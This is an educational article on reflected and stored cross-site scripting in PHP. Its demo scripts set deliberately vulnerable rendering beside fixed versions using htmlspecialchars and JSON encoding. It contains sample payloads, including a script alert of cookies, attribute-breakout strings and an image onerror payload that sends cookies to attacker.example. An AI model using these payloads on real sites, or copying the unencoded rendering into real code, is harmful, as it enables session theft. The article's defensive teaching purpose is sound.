What is a Cross-Site Scripting vulnerability?

XSS (Cross-Site Scripting) is a vulnerability that lets an attacker inject code interpreted by the browser (HTML, and above all JavaScript) into a web page, changing what the page displays or does for the user who views it. It is usually caused by programming errors, in particular trusting user input too much: the application writes data it received into an HTML page without encoding it.
This article covers the two classic types of XSS vulnerability: Reflected XSS (or non-persistent) and Stored XSS (or persistent). A third type, DOM-based XSS, where the injection happens entirely inside client-side JavaScript, is not covered here.

An XSS vulnerability allows an attacker to:

  • Redirect the victim to another site in order to perform phishing

  • Steal information (cookies, session identifiers, page content ...)

  • Perform actions on the vulnerable site in the victim's name, without the victim's knowledge

Reflected XSS (or non-persistent)

It is called non-persistent because the payload is not stored in a file or database on the server: the server merely reflects it back in its response. The payload is delivered to the victim inside a link that contains it (sent by email or by other means) and runs only when the victim follows that link.

Several browsers (Internet Explorer, Edge, Chrome, Safari, Opera) used to ship a built-in anti-XSS filter (Chrome's was called the XSS Auditor). It compared the page sent by the server with the client's request and neutralised any script that appeared in both, which could only ever catch some reflected XSS and never a persistent one. These filters were easy to bypass and sometimes introduced problems of their own, and Chrome and Edge have since removed theirs, so they must not be counted on as a defence: the fix belongs in the application, as described in the protection section of this article.

Example :

You are browsing a site that shows the weather forecast for a given city. The name of the city is passed in the URL of the page as a GET parameter, like this: www.meteo.com/previsionsmeteo?ville=Montpellier

The forecast for the city of Montpellier is displayed on the page returned by the weather site's server. An attacker can build the same URL with malicious content in the parameter, like this (in a real attack the payload would be URL-encoded so that the link looks less suspicious): www.meteo.com/previsionsmeteo?ville=Montpellier<script>alert(document.cookie);</script>

If the server copies the parameter into the page without encoding it, the page will show the forecast for Montpellier but will also contain the injected script, which runs in the browser of whoever opens the link. Here it merely pops up the victim's cookies for the site; a real attacker would send them to a server under their control instead.

Stored XSS (or persistent)

Persistent XSS is the most dangerous kind because the payload is stored on the server, in a file or a database, and is executed every time a page that includes it is loaded, for every user who views it, without the attacker having to send anyone a link. Take a discussion forum as an example.
The attacker posts a message or comment containing malicious content. When other users visit the page containing the fraudulent message or comment, that content runs in their browsers.
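The following script is an added example (it is not part of the original article) that puts the weather example above and the forum example side by side: for each one, a rendering function that writes user data into the page as-is, next to the fixed version that HTML-encodes it at output time. The function and class names, the forum messages and the attacker.example domain are constructed for the demo; the payload is the one from the weather example. It runs from the command line with `php xss_demo.php` and prints the HTML each version would send to the browser.

```php
<?php
// Added example (not from the original article): reflected and stored XSS
// side by side, with the vulnerable rendering and the fixed rendering.
// Runs from the command line: php xss_demo.php
// The city name, forum messages and attacker domain are constructed.

declare(strict_types=1);

// The payload from the article's weather example.
const PAYLOAD = 'Montpellier<script>alert(document.cookie);</script>';

// --- Reflected XSS: the "ville" GET parameter is echoed back into the page ---

// Vulnerable: the parameter is written into the HTML unchanged.
function render_forecast_vulnerable(string $ville): string
{
    return "<h1>Forecast for $ville</h1>";
}

// Fixed: the parameter is HTML-encoded at the moment it is written out.
// ENT_QUOTES encodes both " and ' so the value is also safe inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function render_forecast_safe(string $ville): string
{
    $safe = htmlspecialchars($ville, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<h1>Forecast for $safe</h1>";
}

// --- Stored XSS: a forum keeps messages and shows them to every visitor ---

final class Forum
{
    /** @var string[] */
    private array $messages = [];

    // The raw message is stored. Storing raw data is fine; the mistake is
    // rendering it raw. Encoding on output (not on input) keeps the data
    // usable in other contexts too (JSON API, e-mail, logs).
    public function post(string $message): void
    {
        $this->messages[] = $message;
    }

    // Vulnerable: every visitor receives the attacker's markup verbatim.
    public function render_vulnerable(): string
    {
        $html = '';
        foreach ($this->messages as $m) {
            $html .= "<li>$m</li>";
        }
        return "<ul>$html</ul>";
    }

    // Fixed: each message is encoded when the page is built.
    public function render_safe(): string
    {
        $html = '';
        foreach ($this->messages as $m) {
            $html .= '<li>' . htmlspecialchars($m, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</li>';
        }
        return "<ul>$html</ul>";
    }
}

// Simulate the request www.meteo.com/previsionsmeteo?ville=<payload>.
// The attacker URL-encodes the payload in the link; PHP decodes it into $_GET.
parse_str('ville=' . rawurlencode(PAYLOAD), $get);

echo "Reflected, vulnerable:\n", render_forecast_vulnerable($get['ville']), "\n\n";
echo "Reflected, fixed:\n", render_forecast_safe($get['ville']), "\n\n";

$forum = new Forum();
$forum->post('Nice weather today in Montpellier!');
// A payload that needs no <script> tag: the handler fires when the image fails to load.
$forum->post('<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">');

echo "Stored, vulnerable (runs for every visitor of the page):\n", $forum->render_vulnerable(), "\n\n";
echo "Stored, fixed:\n", $forum->render_safe(), "\n";
```

In the vulnerable outputs the `<script>` and `<img ... onerror>` tags arrive at the browser as markup; in the fixed outputs they arrive as `&lt;script&gt;` and `&lt;img ...&gt;` and are displayed as text. The design choice worth noting is that the forum stores the message unchanged and encodes when rendering: encoding on the way in, before storing, would corrupt the data for any non-HTML consumer and would still leave the rendering code unsafe for data that reached the database by another path.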

How to protect yourself against Cross-Site Scripting vulnerabilities?

The most suitable defence against this vulnerability is to HTML-encode every piece of untrusted data at the moment it is written into the page. In PHP this is done with the htmlspecialchars() function, which replaces the characters that have a special meaning in HTML (<, >, &, " and ') with their HTML entities, so that the browser displays them as text instead of interpreting them as markup. For instance:

  • The symbol & becomes &amp;
  • The symbol < becomes &lt;
  • The symbol > becomes &gt;
  • The symbol " becomes &quot;
  • The symbol ' becomes &#039;

Note that ' is only converted when the ENT_QUOTES flag is passed; before PHP 8.1 the default flags (ENT_COMPAT) left it untouched, which makes a value injected into a single-quoted attribute exploitable. Always pass the flags and the character set explicitly: htmlspecialchars($input, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8').

You can also use the PHP function htmlentities(), which works the same way but additionally converts every other character that has a named HTML entity (accented letters such as é, for example). Converting characters into entities prevents the browser from treating user-supplied text as HTML elements, which is exactly what is needed when users control text that is displayed on a page. Keep in mind that both functions only cover the HTML body and attribute contexts: data placed inside a <script> block, an event-handler attribute, a URL or a CSS rule needs an encoder for that context, and a Content Security Policy gives an additional layer of defence if an encoding step is forgotten somewhere.
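The script below is an added example (not part of the original article) showing what htmlspecialchars() and htmlentities() actually do with the flags discussed above, and going beyond the article on two points a practitioner runs into in practice: double encoding of data that was already encoded, and a value that is correctly HTML-encoded for an attribute but still runs because the attribute is an event handler that the browser decodes before handing it to the JavaScript engine. All inputs are constructed for the demo; the hypothetical show() handler only exists in the sample markup. It runs from the command line with `php encoding_demo.php`.

```php
<?php
// Added example (not from the original article): behaviour of
// htmlspecialchars()/htmlentities() and the cases where HTML encoding alone
// is not enough. Runs from the command line: php encoding_demo.php
// All inputs below are constructed for the demo.

declare(strict_types=1);

// 1. Which characters are converted, with the flags this article recommends.
foreach (['&', '<', '>', '"', "'"] as $c) {
    printf("%s  ->  %s\n", $c, htmlspecialchars($c, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'));
}

// 2. The single-quote trap: with ENT_COMPAT (the default before PHP 8.1)
//    ' is left alone, so a value placed in a single-quoted attribute breaks
//    out of it and adds an event handler. ENT_QUOTES keeps it inside the value.
$input  = "x' onmouseover='alert(document.cookie)";
$weak   = "<input value='" . htmlspecialchars($input, ENT_COMPAT, 'UTF-8') . "'>";
$strong = "<input value='" . htmlspecialchars($input, ENT_QUOTES, 'UTF-8') . "'>";
echo "\nENT_COMPAT : $weak\n";   // the browser sees a real onmouseover attribute
echo "ENT_QUOTES : $strong\n";   // the quote is now an entity, the value stays text

// 3. htmlentities() also converts characters that merely have a named entity
//    (the accented letters here); for XSS protection both are equivalent.
$text = 'Météo à Montpellier <b>';
echo "\nhtmlspecialchars: ", htmlspecialchars($text, ENT_QUOTES, 'UTF-8'), "\n";
echo "htmlentities    : ", htmlentities($text, ENT_QUOTES, 'UTF-8'), "\n";

// 4. Double encoding: data that was already encoded (for instance encoded
//    on input and stored that way) is encoded again unless double_encode is
//    disabled, and the user sees "&lt;b&gt;" on the page. Encoding once, on
//    output, avoids the problem; the flag is only a workaround.
$stored = '&lt;b&gt;';
echo "\ndouble_encode=true : ", htmlspecialchars($stored, ENT_QUOTES, 'UTF-8'), "\n";
echo "double_encode=false: ", htmlspecialchars($stored, ENT_QUOTES, 'UTF-8', false), "\n";

// 5. Wrong context: a value inside an event-handler attribute is HTML, but
//    the browser decodes the entities before the JavaScript engine parses it.
//    html_entity_decode() reproduces that step so we can see what JS runs.
$arg = "'); alert(document.cookie); //";

// Encoded only for HTML: correct as an attribute value, wrong as JS.
$attr = "show('" . htmlspecialchars($arg, ENT_QUOTES, 'UTF-8') . "')";
echo "\nHTML attribute  : <a onclick=\"$attr\">city</a>\n";
echo "JS engine sees  : ", html_entity_decode($attr, ENT_QUOTES, 'UTF-8'), "\n";
// -> show(''); alert(document.cookie); //')  : the string is closed and the alert runs

// Fixed: encode for JavaScript first (a JSON string literal, with the HEX
// flags so the quotes and angle brackets become \uXXXX escapes), then for HTML.
$js   = json_encode($arg, JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP | JSON_HEX_TAG);
$attr = 'show(' . htmlspecialchars($js, ENT_QUOTES, 'UTF-8') . ')';
echo "\nHTML attribute  : <a onclick=\"$attr\">city</a>\n";
echo "JS engine sees  : ", html_entity_decode($attr, ENT_QUOTES, 'UTF-8'), "\n";
// -> show("\u0027); alert(document.cookie); \/\/")  : one string literal, no code
```

Case 5 is the one most often missed: the HTML encoding was done correctly, with ENT_QUOTES, and the page is still vulnerable because the value crosses two interpreters (the HTML parser, then the JavaScript parser) and must be encoded for each of them in reverse order. The same reasoning applies to values written into a URL (urlencode/rawurlencode first) or into CSS.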